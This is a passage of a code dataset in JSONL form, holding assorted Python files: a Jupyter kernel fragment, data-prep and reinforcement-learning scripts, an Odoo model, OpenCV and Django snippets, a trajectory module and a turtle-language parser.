FileOutputStream(new File(new java.net.URI(\"{filename}\")), true)))'\n code = '\\n'.join([\n 'import java.io.{PrintStream, FileOutputStream, File}',\n 'import scala.Console',\n code.format(pipe=\"Out\", filename=pathlib.Path(STDOUT).as_uri()),\n code.format(pipe=\"Err\", filename=pathlib.Path(STDERR).as_uri())\n ])\n o = magic.eval(code, raw=True)\n self.log.critical(\"Console redirected %s\", o)\n\n loop = asyncio.get_event_loop()\n loop.create_task(self._poll_file(STDOUT, self.Write))\n loop.create_task(self._poll_file(STDERR, self.Error))\n\n ioloop.IOLoop.current().spawn_callback(self._loop_alive)\n\n @gen.coroutine\n def _loop_alive(self):\n \"\"\"This is a little hack to ensure that during the tornado eventloop we also run one iteration of the asyncio\n eventloop.\n\n \"\"\"\n loop = asyncio.get_event_loop()\n while True:\n loop.call_soon(loop.stop)\n loop.run_forever()\n yield gen.sleep(0.01)\n\n async def _poll_file(self, filename, fn):\n \"\"\"\n\n Parameters\n ----------\n filename : str\n fn : (str) -> None\n Function to deal with string output.\n \"\"\"\n fd = open(filename, 'r')\n while True:\n line = fd.readline()\n if line:\n self.log.critical(\"READ LINE from %s, %s\", filename, line)\n fn(line)\n self.log.critical(\"AFTER PUSH\")\n await asyncio.sleep(0)\n else:\n await asyncio.sleep(0.01)\n\n# TODO: Comm api style thing. Basically we just need a server listening on a port that we can push stuff to.\n\n# localhost:PORT/output\n# {\n# \"output_id\": \"string\",\n# \"mimetype\": \"plain\",\n# \"data\": object()\n# }\n","sub_path":"spylon_kernel/scala_kernel.py","file_name":"scala_kernel.py","file_ext":"py","file_size_in_byte":7520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"352656000","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\n\r\ndatapath = \"./preliminary_contest_data/\"\r\n\r\nad_features_df = pd.read_csv(os.path.join(datapath, \"adFeature.csv\"))\r\nprint(\"ad_features_df shape\", ad_features_df.shape)\r\nuser_features = []\r\nwith open(os.path.join(datapath, \"userFeature.data\"), 'r') as fid:\r\n for line in fid:\r\n feature_dict = dict()\r\n fields = line.strip('\\n').split('|')\r\n for field in fields:\r\n splits = field.split(' ')\r\n feature_name = splits[0]\r\n feature_value = ' '.join(splits[1:])\r\n feature_dict[feature_name] = feature_value\r\n user_features.append(feature_dict)\r\nuser_features_df = pd.DataFrame(user_features)\r\nuser_features_df['uid'] = user_features_df['uid'].map(lambda x: int(x))\r\nprint(\"user_features_df shape\", user_features_df.shape)\r\n\r\ntrain_df = pd.read_csv(os.path.join(datapath, \"train.csv\"))\r\nprint(\"train_df shape\", train_df.shape)\r\n\r\ntrain_with_ad = pd.merge(train_df, right=ad_features_df, on=\"aid\", how=\"left\")\r\ntrain_with_ad_user = pd.merge(train_with_ad, right=user_features_df, on=\"uid\", how=\"left\")\r\ntrain_with_ad_user = train_with_ad_user.reindex(columns=[\"label\",\"aid\",\"uid\",\"advertiserId\",\"campaignId\",\"creativeId\",\"creativeSize\",\"adCategoryId\",\"productId\",\"productType\",\"age\",\"gender\",\"marriageStatus\",\"education\",\"consumptionAbility\",\"LBS\",\"ct\",\"os\",\"carrier\",\"appIdInstall\",\"appIdAction\",\"house\",\"topic1\",\"topic2\",\"topic3\",\"interest1\",\"interest2\",\"interest3\",\"interest4\",\"interest5\",\"kw1\",\"kw2\",\"kw3\"])\r\ntrain_with_ad_user['label'] = train_with_ad_user['label'].map(lambda x: 1 if float(x) > 0 else 0)\r\ntrain_with_ad_user.to_csv(\"train.csv\", index=False)\r\nprint(\"train_with_ad_user shape\", train_with_ad_user.shape)\r\n\r\n\r\ntest_df = pd.read_csv(os.path.join(datapath, \"test1_truth.csv\"), header=None, names=['aid', 'uid', 'label'])\r\nprint(\"test_df shape\", test_df.shape)\r\ntest_with_ad = pd.merge(test_df, right=ad_features_df, on=\"aid\", how=\"left\")\r\ntest_with_ad_user = pd.merge(test_with_ad, right=user_features_df, on=\"uid\", how=\"left\")\r\ntest_with_ad_user = test_with_ad_user.reindex(columns=[\"label\",\"aid\",\"uid\",\"advertiserId\",\"campaignId\",\"creativeId\",\"creativeSize\",\"adCategoryId\",\"productId\",\"productType\",\"age\",\"gender\",\"marriageStatus\",\"education\",\"consumptionAbility\",\"LBS\",\"ct\",\"os\",\"carrier\",\"appIdInstall\",\"appIdAction\",\"house\",\"topic1\",\"topic2\",\"topic3\",\"interest1\",\"interest2\",\"interest3\",\"interest4\",\"interest5\",\"kw1\",\"kw2\",\"kw3\"])\r\ntest_with_ad_user['label'] = test_with_ad_user['label'].map(lambda x: 1 if float(x) > 0 else 0)\r\ntest_with_ad_user.to_csv(\"test.csv\", index=False)\r\nprint(\"test_with_ad_user shape\", test_with_ad_user.shape)\r\n\r\n\r\n","sub_path":"OpenCTR1119/data/scripts/split_taac18_dataset_x1x2.py","file_name":"split_taac18_dataset_x1x2.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"308111946","text":"# class Wife:\n# \"\"\"\n# 老婆\n# \"\"\"\n# #1.数据成员:姓名,年龄,性别\n# def __init__(self,name,age,sex):\n# self.name=name\n# self.age=age\n# self.sex=sex\n#\n# #2.方法成员:做饭\n# def cooking(self):\n# print(\"做饭\")\n# #创建对象\n# #调用__init__(self,name,age,sex)\n# w01=Wife()\n\n#(1)学生student是一个类,具有姓名,年龄等数据;\n'''\n#具有学习study,工作work等行为。\nclass Student:\n \"\"\"\n 学生\n \"\"\"\n def __init__(self,name,age):\n self.name = name\n self.age = age\n\n def study(self):\n print(self.name+\"学习,\"+str(self.age))\n\n def work(self):\n print(self.name+\"工作,\"+str(self.age))\n\nw01=Student(\"悟空同学\",28)\nw01.study()\nw01.work()\n\nw02=Student(\"八戒同学\",29)\nw02.study()\nw02.work()\n'''\n\nclass Enemy:\n \"\"\"\n 敌人\n \"\"\"\n def __init__(self,name=\"\",hp=0,atk=0,atk_speed=0):\n self.name=name\n self.hp=hp\n self.atk=atk\n self.atk_speed=atk_speed\n\n def print_self(self):\n print(self.name,self.hp,self.atk,self.atk_speed)\n\n\n#1.在控制台中输入3个敌人,存入列表\nlist=[]\nfor i in range(3):\n e=Enemy()\n e.name=str(input(\"请输入第%d次的名字:\"%(i+1)))\n e.hp = int(input(\"请输入%d次的血量:\"%(i+1)))\n e.atk = float(input(\"请输入%d次的攻击力:\"%(i+1)))\n e.atk_speed = float(input(\"请输入%d次的攻击速度:\"%(i+1)))\n list.append(e)\nfor item in list:\n item.print_self()\n\n\n# 练习3:定义函数,在敌人列表中,根据姓名查找敌人对象.\n# e01 = Enemy(\"zs\",100,10,2)\n# e02 = Enemy(\"ls\",200,5,3)\n# e03 = Enemy(\"ww\",300,8,5)\n#\n# list_enemy = [e01,e02,e03]\n\ndef get_enemy_for_name(list_enemy,name):\n # 遍历敌人列列表\n for item in list_enemy:\n # 如果有指定名称的敌人对象\n if item.name == name:\n # 则返回对象地址\n return item\n\nlist01 = [\n Enemy(\"zs\",100,10,2),\n Enemy(\"ls\", 200, 5, 3),\n Enemy(\"ww\",300,8,5)\n]\n\nre = get_enemy_for_name(list01,\"ls\")\nif re != None:\n re.print_self()\nelse:\n print(\"没有找到\")\n\n\n\n\n\n\n\n\n\n","sub_path":"Mr.左/month01/代码/day08/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"24056500","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass UploadDefinition(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, bytes: int=None, location: str=None): # noqa: E501\n \"\"\"UploadDefinition - a model defined in Swagger\n\n :param bytes: The bytes of this UploadDefinition. # noqa: E501\n :type bytes: int\n :param location: The location of this UploadDefinition. # noqa: E501\n :type location: str\n \"\"\"\n self.swagger_types = {\n 'bytes': int,\n 'location': str\n }\n\n self.attribute_map = {\n 'bytes': 'bytes',\n 'location': 'location'\n }\n self._bytes = bytes\n self._location = location\n\n @classmethod\n def from_dict(cls, dikt) -> 'UploadDefinition':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The UploadDefinition of this UploadDefinition. # noqa: E501\n :rtype: UploadDefinition\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def bytes(self) -> int:\n \"\"\"Gets the bytes of this UploadDefinition.\n\n\n :return: The bytes of this UploadDefinition.\n :rtype: int\n \"\"\"\n return self._bytes\n\n @bytes.setter\n def bytes(self, bytes: int):\n \"\"\"Sets the bytes of this UploadDefinition.\n\n\n :param bytes: The bytes of this UploadDefinition.\n :type bytes: int\n \"\"\"\n\n self._bytes = bytes\n\n @property\n def location(self) -> str:\n \"\"\"Gets the location of this UploadDefinition.\n\n\n :return: The location of this UploadDefinition.\n :rtype: str\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location: str):\n \"\"\"Sets the location of this UploadDefinition.\n\n\n :param location: The location of this UploadDefinition.\n :type location: str\n \"\"\"\n\n self._location = location\n","sub_path":"src/odin-http/swagger_server/models/upload_definition.py","file_name":"upload_definition.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"44326584","text":"import cv2\n\ndef main():\n\n windowName = \"Live video feed\"\n cv2.namedWindow(windowName)\n \n windowName1 = \"Live video feed 1\"\n cv2.namedWindow(windowName1)\n\n Regular = \"video feed\"\n cv2.namedWindow(Regular)\n \n Regular1 = \"video feed\"\n cv2.namedWindow(Regular1)\n\n cap = cv2.VideoCapture(0)\n cap1 =cv2.VideoCapture(1)\n\t\n #video of lappy webcam.\n if cap.isOpened():\n ret,frame = cap.read()\n else:\n ret = False\n\n while ret:\n ret,frame= cap.read()\n output = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) \n cv2.imshow (Regular, frame) \n cv2.imshow(windowName,output)\n if cv2.waitKey(1)==27:\n break\n cv2.destroyWindow(windowName)\n cv2.destroyWindow(Regular)\n\n cap.release()\n\n\t# video of external cam\n if cap1.isOpened():\n ret1,frame1 = cap1.read()\n else:\n ret1 = False\n\n while ret1:\n ret1,frame1= cap1.read()\n output1 = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY) \n cv2.imshow ('Regular1', frame1)\n cv2.imshow(windowName1,output1) \n if cv2.waitKey(1)==27:\n break\n cv2.destroyWindow(windowName1)\n cv2.destroyWindow(Regular1)\n \n cap1.release()\n\nif __name__== \"__main__\":\n main() \n","sub_path":"Programs/19_ex3_CamGrayLive.py","file_name":"19_ex3_CamGrayLive.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"84745900","text":"# 最后复习 9.27\n\n# 取前K个最大的数\n\n# 方法1:可以采用数据池的思想,选择其中前K个数作为数据池,\n# 后面的N-K个数与这K个数进行比较,若大于其中的任何一个数,则对其与当前前K个数中最小的数替换。\n# 这种思路的算法复杂度是O(N*K)。\n\n# 方法2利用快速排序的分划函数找到分划位置K,则其前面的内容即为所求。\n# 该算法是一种非常有效的处理方式,时间复杂度是O(N)(证明可以参考算法导论书籍)。\n\n# 方法3利用堆排序。\n\ndef partition(array, left, right):\n pivot = array[right]\n i = left - 1\n for j in range(left, right):\n if array[j] <= pivot:\n i += 1\n array[i], array[j] = array[j], array[i]\n array[i+1], array[right] = array[right], array[i+1]\n return i+1\n\n\ndef topK(array, K):\n if len(array) < K:\n pass\n low = 0\n high = len(array) - 1\n j = partition(array, low, high)\n while j != K:\n # 划分位置不是K则继续处理\n if K > j:\n # k在分划点后面部分\n low = j + 1\n else:\n # K在分划点前面部分\n high = j - 1\n j = partition(array, low, high)\n\n\nK = 4\ntest1 = [9, 8, 1, 2, 3, 5, 4, 6, 7]\ntopK(test1, K)\nprint(test1[:K])","sub_path":"topK_three_realizations.py","file_name":"topK_three_realizations.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"589381595","text":"\"\"\" R Learning application to the RiverSwim problem \n\nIn this script, we apply R Learning (Schwartz - 1993) to solve the average reward for the \nRiverSwim MDP.\n\nFrom the slides of Alessandro Lazaric, Exploration-Exploitation in Reinforcement Learning (Part1), \nand solving analytically the RiverSwim, we know that the gain value is 0.4286\n\nThis script requires that `numpy`, `matplotlib` and `pickle` be installed within the Python \nenvironment you are running this script in.\n\n\"\"\"\n\nimport os\nimport numpy as np\nimport random\nfrom tqdm import tqdm\nfrom mdp_riverswim import RiverSwim_Split\nimport matplotlib.pyplot as plt\n\ndef r_learning(env, alpha=0.01, beta=0.01, max_steps=50):\n \"\"\" R Learning algorithm (Schwartz - 1993) to solve the average reward problem\n\n Args:\n env - the object of the environment. In this case, the RiverSwim object.\n alpha - learning rate to update the Q-values\n beta - learning rate to update the gain, rho\n max_steps = maximum number of steps for r-learning\n \n Returns:\n rho - array with all rho values given by r-learning\n values - array of all values for the recurrent state, during all interations of r-learning\n \"\"\"\n\n env.state_values, env.state_q_values = env.init_values()\n rho = 0.0\n epsilon=0.3\n \n rhos = []\n ves = []\n\n for t in tqdm(range(max_steps)):\n\n # every 20 steps we reset the initial state\n if(t%20==0):\n state = random.choice(env.states)\n\n # for 1000 steps, save rho and v(sI)\n if(t%1000==0):\n rhos.append(rho)\n ves.append(env.state_values[sI])\n # print(f't={t}, p={rho}, v_s0={env.state_values[sI]}')\n \n # get action for current state\n action = env.getAction(state, epsilon, t)\n\n # apply action, gte new state and reward\n new_state, reward = env.step(state, action)\n\n # update Q-values and the policy\n sample = (reward - rho) + np.max(env.state_q_values[new_state]) \n env.state_q_values[state][action] = (1-alpha)*env.state_q_values[state][action] + alpha*sample\n env.state_q_values[0,:] = 0.0\n env.policy[state] = np.argmax(env.state_q_values[state])\n env.state_values[state] = np.max(env.state_q_values[state])\n \n # update rho\n rho = rho + beta*(reward - rho + np.max(env.state_q_values[new_state]) -\n np.max(env.state_q_values[state]))\n \n if(new_state==0):\n state = random.choice(env.states[1:]) \n else:\n state = new_state\n\n return rhos, ves\n\n# ------------------------------------------------------------------------------\n\n# recurrent state for RiverSwim (state 1)\nsI = 1\n# max number of steps for R Learning\nsteps = 4000e3 \n# learning rate to update the Q-values\nalpha = 0.0001\n# learning rate to update the gain, rho\nbeta = 0.000001\n# path to save data\npath = './results_rlearning/'\nif not os.path.exists(path):\n os.makedirs(path)\n\n# Create the environment\nenv = RiverSwim_Split(sI)\n# Solve by R Learning\nrhos, ves = r_learning(env, alpha=alpha, beta=beta, max_steps=int(steps))\n\n# save records for rho and value of sI\nnp.save(path+'rhos.npy',rhos)\nnp.save(path+'values_sI.npy',ves)\n","sub_path":"RiverSwim/rlearning.py","file_name":"rlearning.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483253509","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, timedelta\nfrom odoo import api, fields, models\n\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n\n product_image_360_ids = fields.One2many('product.image.360', 'product_tmpl_id', string='Images')\n display_360_image = fields.Boolean(string='Display 360 Image')\n\nclass ProductImage360(models.Model):\n _name = 'product.image.360'\n _order = 'sequance'\n\n name = fields.Char(string='Name')\n image = fields.Binary(string='Image', attachment=True)\n product_tmpl_id = fields.Many2one('product.template', string='Related Product', copy=True)\n sequance = fields.Integer(string=\"Sequance\")\n","sub_path":"models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"449381661","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 13:43:04 2019\n\n@author: Ajinkya Sakhare\n\"\"\"\nimport numpy as np\nimport solver_utils\n\ndef solve(inputmatrix):\n \"\"\"\n This function contains a solution to the data in 4be741c5.json posed by the Abstraction and\n Reasoning Corpus (ARC).\n\n The problem presents an n x m grid, with some rows containing 0-m coloured squares with repetition over a row or colomuns.\n The solution requires the rows to be ordered such that it get color of all unique colors if it is either row-wise or colomun-wise.\n \"\"\"\n #Empty result list to return results\n result=[]\n #convert input to numpy array\n\n y = np.array([np.array(xi) for xi in inputmatrix])\n\n if len(np.unique(y[:1][0]))>1:#if the count of unique colors is more than one\n\n indexes = np.unique(y[:1][0], return_index=True)[1] #Get the indexes of unique colour\n row=[y[:1][0][index] for index in sorted(indexes)]#Get the unique colors in unsorted list\n result.append(row)#append row to result\n\n else:#if colour are in colomun\n indexes = np.unique(y[:, 0], return_index=True)[1]#Get the indexes of unique colour\n colomun = [y[:, 0][index] for index in sorted(indexes)]#Get the unique colors in unsorted list\n for value in colomun:\n result.append([value])#Appending values to the result\n return (result)\n\nif __name__ == \"__main__\":\n data = solver_utils.parse_json_file()\n\n for training in data['train']:\n solver_utils.solve_wrapper(training['input'], solve)\n\n for testing in data['test']:\n solver_utils.solve_wrapper(testing['input'], solve)\n","sub_path":"src/solution_4be741c5.py","file_name":"solution_4be741c5.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"369415101","text":"from django.shortcuts import render\nfrom resume.models import *\n\nsummary=\"\"\"\nI'm a fresh graduate with bachelor degree in computer science.\nI'm a self-taught python programmer.\nI'm interested in learning new things and increasing my knowledge relevant to python\nprogramming language and other information technology.\n\"\"\"\ntitle='Resume'\nname='Herry Wijaya'\noccupation='Full Stack Web Developer'\naddress='Bogorpark Residence Blok D27 Pamoyanan, Bogor, Jawa Barat'\nemail='herrywijaya065116076@unpak.ac.id'\ntelephone='0895632067037'\n# Create your views here.\ndef index(request):\n a=list(skill.objects.all())\n b=list(license.objects.all())\n c=list(experience.objects.all())\n d=list(education.objects.all())\n return render(request,'resume/index.html',{'title':title,'name':name,\n 'occupation':occupation,\n 'address':address,\n 'email':email,\n 'telephone':telephone,\n 'a':a,\n 'summary':summary,\n 'b':b,\n 'c':c,\n 'd':d\n })\n","sub_path":"portfolio/resume/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"581644796","text":"import math\nfrom copy import deepcopy\nimport numpy as np\nfrom numpy import pi\n\n# import matplotlib.pyplot as plt\nfrom scipy import interpolate\nfrom scipy.optimize import fminbound\nfrom gncgym.utils import angwrap\n\n\nclass Trajectory:\n def __init__(self, t,\n x, y, z=None, u=None, v=None, w=None,\n roll=None, pitch=None, yaw=None, rollrate=None, pitchrate=None, yawrate=None):\n pass\n\n def __call__(self, *args, **kwargs):\n pass\n\nclass ParamLine():\n def __init__(self, startpoint, endpoint):\n self.startpoint = startpoint\n self.endpoint = endpoint\n x1, y1 = startpoint\n x2, y2 = endpoint\n dx = x2 - x1\n dy = y2 - y1\n L = math.sqrt(dx ** 2 + dy ** 2)\n a_x = dx/L\n a_y = dy/L\n\n self.A = np.array([[a_x], [a_y]])\n self.p0 = np.array([[x1], [y1]])\n self.length = L\n self.angle = angwrap(np.arctan2(dy, dx))\n\n def __call__(self, s):\n s = np.array(s)\n return self.p0 + self.A * np.vstack([s,s])\n\n def get_angle(self, s=None):\n if s is None:\n return self.angle\n s = np.array(s)\n if s.shape == ():\n s = np.array([s])\n return np.array([self.angle for i in s])\n\n def get_endpoint(self):\n return self(self.length)\n\n def get_closest_s(self, p):\n p = np.vstack(p)\n # if p.shape != 2:\n # p = np.transpose(p)\n return fminbound(lambda s: np.linalg.norm(self(s) - p), 0, self.length, xtol=1e-2)\n\n def plot(self, ax, s, *opts):\n\n z = self(s)\n ax.plot(-z[1,:], z[0,:], *opts)\n\n def __reversed__(self):\n return ParamLine(self.endpoint, self.startpoint)\n\n\nclass ParamCurve():\n def __init__(self, waypoints):\n waypoints = np.array(waypoints)\n if waypoints.shape[0] != 2:\n waypoints = np.transpose(waypoints)\n\n Z = waypoints\n for i in range(3):\n S = arc_len(Z)\n C = interpolate.pchip(x=S, y=Z, axis=1)\n Z = C(np.linspace(S[0], S[-1], 1000))\n\n self.C = C\n self.s_min = S[0]\n self.s_max = S[-1]\n self.length = self.s_max\n\n def __call__(self, s, check_domain=False):\n s = np.array(s)\n if check_domain and s.min() < self.s_min or s.max() > self.s_max:\n pass\n # logging.warning('Argument s outside of curve domain: {}'.format((self.s_min, self.s_max)))\n return self.C(s)\n\n def get_angle(self, s, check_domain=False):\n s = np.array(s)\n if check_domain and s.min() < self.s_min or s.max() > self.s_max:\n pass\n # logging.warning('Argument s outside of curve domain: {}'.format((self.s_min, self.s_max)))\n\n if s.shape == ():\n s = np.array([s])\n output = []\n for ss in s:\n dx, dy = (self.C(ss + 0.05) - self.C(ss - 0.05)).flatten()\n output.append(angwrap(np.arctan2(dy, dx)))\n return np.array(output)\n\n def get_endpoint(self):\n return self(self.s_max)\n\n def get_closest_s(self, p):\n # p = np.vstack(p)\n # if p.shape != 2:\n # p = np.transpose(p)\n\n def distance(p1, p2):\n return np.sqrt((float(p1[0]) - float(p2[0]))**2 + (float(p1[1]) - float(p2[1]))**2)\n\n return fminbound(lambda s: distance(self(s), p), x1=0, x2=self.length, xtol=1e-6, maxfun=10000)\n\n def __reversed__(self):\n curve = deepcopy(self)\n C = curve.C\n curve.C = lambda s: C(curve.length-s)\n return curve\n\n def plot(self, ax, s, *opts):\n s = np.array(s)\n z = self(s)\n ax.plot(-z[1,:],z[0,:], *opts)\n\n\nclass ParamCircle:\n def __init__(self, center, radius):\n self.R = radius\n self.center = np.array(center)\n if self.center.shape == (2,):\n self.center = np.transpose([self.center])\n self.length = 2*pi*self.R\n\n def __call__(self, s):\n p = np.vstack([self.R*np.cos(s/self.R), self.R*np.sin(s/self.R)])\n return p + self.center\n\n def get_angle(self, s):\n s = np.array(s)\n if s.shape == ():\n s = np.array([s])\n return np.array([angwrap(pi/2 + ss/self.R) for ss in s])\n\n def get_endpoint(self):\n return self(self.length-100)\n\n def get_closest_s(self, p):\n # p = np.vstack(p)\n # if p.shape != 2:\n # p = np.transpose(p)\n\n def distance(p1, p2):\n return np.sqrt((float(p1[0]) - float(p2[0]))**2 + (float(p1[1]) - float(p2[1]))**2)\n\n return fminbound(lambda s: distance(self(s), p), x1=0, x2=self.length, xtol=1e-3, maxfun=10000)\n\n def plot(self, ax, s, *opts):\n s = np.array(s)\n z = self(s)\n ax.plot(-z[1, :], z[0, :], *opts)\n\n\nclass RandomLineThroughOrigin(ParamLine):\n def __init__(self, rng, length=100, origin=(0,0)):\n angle = math.pi*rng.randint(0, 360)/180\n x1, y1 = math.cos(angle)*length/2 + origin[0], math.sin(angle)*length/2 + origin[1]\n x2, y2 = -x1, -y1\n super().__init__([x1, y1], [x2, y2])\n\n\nclass RandomCurveThroughOrigin(ParamCurve):\n def __init__(self, rng, start, end=None):\n p = []\n if end is None:\n end = -np.array(start)\n\n for vec in [start, end]:\n vec = np.array(vec)\n L = np.sqrt(np.sum(vec ** 2))\n p.append(vec/2.0 + L/4*(rng.rand()-0.5))\n\n super().__init__([start, p[0], [0, 0], p[1], end])\n\n\ndef arc_len(Z):\n Z = np.array(Z)\n diffZ = np.diff(Z, axis=1)\n dZ = np.sqrt(np.sum(diffZ ** 2, axis=0))\n return np.concatenate([[0], np.cumsum(dZ)])\n\n\nif __name__ == '__main__':\n from random import random\n import matplotlib.pyplot as plt\n fig, (ax11, ax12) = plt.subplots(1, 2)\n\n start = 10*(random()-0.5), 10*(random()-0.5)\n end = -start[0] + 3*(random()-0.5), -start[1] + 3*(random()-0.5)\n\n C = ParamCircle((0,1), 5)\n s = np.linspace(0, C.length, 500)\n z = C(s)\n a = C.get_angle(s)\n ax11.plot(z[0, :], z[1, :], 'b')\n ax11.plot([0], [1], 'ro')\n ax11.axis('equal')\n\n # ax11.plot(start[0], start[1], 'go')\n\n ax12.plot(s, a, 'g')\n ax12.axis([min(s), max(s), -pi, pi])\n\n\n\n plt.show()\n","sub_path":"src/gncgym/trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"557048694","text":"#-*- coding: utf-8 -*-\n\n# Trolle Geuna\n# Oskar Casselryd\n\n\nfrom sys import stdin, setrecursionlimit\nimport re\nimport math\nfrom syntaxfel import Syntaxfel\nfrom linkedQFile import *\n\nclass Node(object):\n def __init__(self, data, row, nextnode=None):\n self.data = data\n self.nextnode = nextnode\n self.row = row\n\n def __str__(self):\n return str(self.data)\n\nclass Leonardo(object):\n def __init__(self):\n self.x = float(0.0000)\n self.y = float(0.0000)\n self.color = \"#0000FF\"\n self.angle = 0\n self.down = False\n self.printout = []\n\n\n def __str__(self):\n return str(self.color, self.x1, self.y1, self.x2, self.y2)\n\n\ndef main():\n setrecursionlimit(100000)\n # skapar en liten liten sköldpadda\n leonardo = Leonardo()\n q = LinkedQ()\n # stdin = open(\"firstsample.in\")\n\n rad = stdin.readline()\n\n row = 1\n\n while rad:\n rad = rad.split(\"%\", 1)[0] # Ta bort kommentarer.\n\n for tkn in rad.split():\n buildTokens(q, tkn, row) # Lägg till tokens.\n\n row =row +1\n rad = stdin.readline() # Läs in ny rad.\n\n try: # Skriv ut alla linjer\n match(q, leonardo)\n for i in range(0, len(leonardo.printout)): # Skriv ut allt när vi är klara.\n print(leonardo.printout[i])\n\n # Såvida det inte failar. Då skriver vi ut syntaxfel.\n except Syntaxfel as felet:\n print(felet)\n\n# Lägger till tokens i q.\ndef buildTokens(q, tkn, row):\n if tkn != None:\n # \"X\n if re.search(\"^\\\".+$\", tkn, re.IGNORECASE):\n q.enqueue(\"\\\"\", row)\n buildTokens(q, tkn[1:], row)\n\n # X\"\n elif re.search(\".+\\\"\", tkn, re.IGNORECASE):\n buildTokens(q, tkn[:-1], row)\n q.enqueue(\"\\\"\", row)\n\n #### X.X. ####\n elif re.search(\"^.+\\..+$\", tkn, re.IGNORECASE):\n splitshit = tkn.split(\".\")\n # Låt nästa varv ta hand om det.\n buildTokens(q, splitshit[0], row)\n # lägg till en punkt!\n q.enqueue(\".\", row)\n # Kör detta genom buildTokens igen.\n nyToken = \".\".join(splitshit[1:])\n\n buildTokens(q, nyToken, row)\n\n # helvete = re.findall(\"\\.\", tkn)\n # helvete2 = re.findall(\"[^\\.]\", tkn)\n # print(\"här är helvete:\", helvete)\n # print(\"helvete 2: \", helvete2)\n # if re.search(\"^\\..+$\", tkn, re.IGNORECASE):\n # # börjar på punkt\n # elif re.search(\"^.+\\.$\", tkn, re.IGNORECASE):\n # # slutar på punkt\n # elif re.search(\"^\\..+\\.$\", tkn, re.IGNORECASE):\n # # börjar och slutar på punkt\n # else:\n # # ingen punkt i början eller slut\n #\n # splittad = tkn.split(\".\")\n # for i in range(0, len(splittad)): # Lägg till alla saker i vår nya queue\n # if splittad[i] != \"\":\n # buildTokens(q, splittad[i], row)\n # print(\"Argument: \",q.last.data)\n # if q.last.data.upper() == \"DOWN\" or q.last.data.upper() == \"UP\":\n # q.enqueue(\".\", row)\n # print(\"Punkt: \",q.last.data)\n\n # X.\n elif re.search(\"^.+\\.$\", tkn):\n buildTokens(q, tkn[:-1], row)\n q.enqueue(\".\", row)\n\n # .X\n elif re.search(\"^\\..+$\", tkn):\n q.enqueue(\".\", row)\n buildTokens(q, tkn[:-1], row)\n\n # Alla \"vanliga\" ord/tecken.\n else:\n if tkn != \"\":\n q.enqueue(tkn, row)\n\n\n\n\n\ndef match(q,leonardo):\n\n latestRow = 0\n\n # Vi måste ha en queue.\n if q == None:\n return\n\n # Kolla edge-case.\n if q.peek() == None :\n return\n\n # DOWN eller UP\n elif re.search(\"^(DOWN|UP)$\", q.peek(), re.IGNORECASE):\n latestRow = q.first.row\n updown(leonardo, q.peek().upper())\n q.dequeue()\n\n # Kolla att det är en punkt efter!\n if q.peek()==\".\":\n latestRow = q.first.row\n q.dequeue()\n match(q,leonardo)\n\n # Kasta error om punkt saknas.\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n # LEFT, RIGHT, FORW, BACK\n elif re.search(\"^(LEFT|RIGHT|FORW|BACK)$\", q.peek(), re.IGNORECASE):\n latestRow = q.first.row\n inst = q.peek() # Spara instruktionen.\n q.dequeue()\n\n # Plocka ut numret efter. isNumber raisar error vid behov.\n n = isNumber(q.peek())\n if not n: # isNumber return false. Det är inte ett heltal.\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n q.dequeue()\n # Ändra grejer hos leonardo.\n move(leonardo, inst.upper(), n)\n\n # Kolla att det slutar med en punkt.\n if q.peek()==\".\":\n latestRow = q.first.row\n q.dequeue()\n\n match(q, leonardo) # Kalla match igen. Rekursivt o grejer.\n\n # Raise error annars.\n elif q.first == None:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(latestRow))\n else:\n raise Syntaxfel(\"Syntaxfel på rad \"+ str(q.first.row))\n\n\n elif re.search(\"^COLOR$\", q.peek(), re.IGNORECASE):\n # print(\"Matchar COLOR\")\n latestRow = q.first.row\n q.dequeue()\n\n 